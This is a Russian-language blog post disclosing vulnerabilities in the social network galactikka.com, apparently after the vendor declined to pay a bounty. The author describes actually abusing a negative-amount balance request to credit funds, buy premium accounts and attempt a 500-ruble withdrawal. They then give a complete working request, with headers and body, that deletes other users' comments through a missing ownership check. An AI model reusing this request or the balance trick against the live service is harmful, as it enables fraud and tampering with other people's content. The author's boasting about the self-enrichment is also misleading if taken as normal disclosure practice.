Security Idiot

pic.php%00png

Галактика багов

Есть некая соц. сеть galactikka.com, которая работает довольно давно, а так же имеет ряд уязвимостей, за которые разработчикам должно быть стыдно :)

Решил за них выполнить работу, естественно бесплатно, так как данный сервис отказался выплатить хоть какое либо вознаграждение, даже грубить стали ;) enter image description here

Я понимаю, сервис копейки приносит, не будем бедных грабить.

Первое что я нашел после 15 минут пребывания на данном сервисе, это тот факт, что при отправке ajax запроса на просмотр баланса (при переходе на страницу вывода, осуществляается данный запрос), можно было поставить сумму например -100000 и получить 100000 р. на сервисе, соотсветсвенно я купил парочку ненужных премиум аккаунтов, что бы удостовериться в том, что деньги реально есть на счету, а так же поставил на вывод, если не ошибаюсь 500 р. на wmr кошелек, после 3х суток ожидания денег, решил написать, что якобы я вывел деньги, но они не дошли и в чем собственно дело, на что получить ответ - “ждите”, а еще после суток пришел ответ, что я негодяй и воспользовался дырок, что бы заполучить 500 р. xD

Признавать тот факт что кодеров нужно уволить - отказались. Написал им так же что есть еще ряд дыр, которые я могу слить за отдельное финансирование, но как я уже писал выше, ответ был категоричен :)

Нет проверки овнера комментария при удалении

И так, первая дыра (на 02.07.2017 актуальна). Например у нас есть пост оф. команды проекта enter image description here

Для начала узнаем id комментария: enter image description here

Получили: 59578449bd047002458b456d

Теперь все, что осталось сделать, это отправить xhr на удаление комментария:

1
POST https://galactikka.com/post/delete-comment

с хедерами:

1
2
3
4
5
6
7
8
9
10
11
Host: galactikka.com
User-Agent: {крутой ua}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://galactikka.com/news-59576cc5bd0470030d8b4567
Content-Length: 68
Cookie: PHPSESSID={сессия}; localTimezoneOffset=0
Connection: keep-alive

и телом:

1
post_id=59576cc5bd0470030d8b4567&comment_id=5958fa73bd0470957e8b456a

Где comment_id полученый id.

В ответ придет json с содержимым:

1
error    "0"

Чужой коммент удален ;)

Многочисленный sql-error

Существуют многочисленные потенциально опасные sql ошибки, которые, на удивление даже обрабатываются эксепшенами.

Работайте.